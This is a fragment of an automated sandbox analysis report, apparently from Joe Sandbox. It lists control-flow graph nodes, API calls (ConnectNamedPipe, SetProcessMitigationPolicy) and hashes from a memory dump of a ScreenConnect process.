                                                                      control_flow_graph 419 7ffd9b3f3662-7ffd9b4162a0 ConnectNamedPipe 423 7ffd9b4162a2 419->423 424 7ffd9b4162a8-7ffd9b4162f0 call 7ffd9b4162f1 419->424 423->424
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1813561393.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ConnectNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 2191148154-0
                                                                      • Opcode ID: d59a5f50b3eed611ea7560590ce6e99c00445d45566a120f8fc912e5ed6de01b
                                                                      • Instruction ID: cd14c21f3e177d0891505a03440fe4fee02a8e688454a62b75b695edfa4b5620
                                                                      • Opcode Fuzzy Hash: d59a5f50b3eed611ea7560590ce6e99c00445d45566a120f8fc912e5ed6de01b
                                                                      • Instruction Fuzzy Hash: BB316E70E08A1C8FDB58EF98C849BE9B7F1FB69311F10826AD00DD7255DB74A945CB81

                                                                      Control-flow Graph

                                                                      control_flow_graph 428 7ffd9b3f3aa2-7ffd9b3f80ef 430 7ffd9b3f80f6-7ffd9b3f8150 SetProcessMitigationPolicy 428->430 431 7ffd9b3f8158-7ffd9b3f8187 430->431 432 7ffd9b3f8152 430->432 432->431
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1813561393.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: 1d6d324456c079a6f5267d1d9ecb1bdb6ce4146bf53a9a10f220649d858dca18
                                                                      • Instruction ID: e472583dbb76c3aa78d664b754161fad1d6dda680a9365f44f5d00591ef24670
                                                                      • Opcode Fuzzy Hash: 1d6d324456c079a6f5267d1d9ecb1bdb6ce4146bf53a9a10f220649d858dca18
                                                                      • Instruction Fuzzy Hash: 0F21B631918B188FDB28AF9D9C4AAF97BE0EB69711F00423EE059D3251DB74B8458B91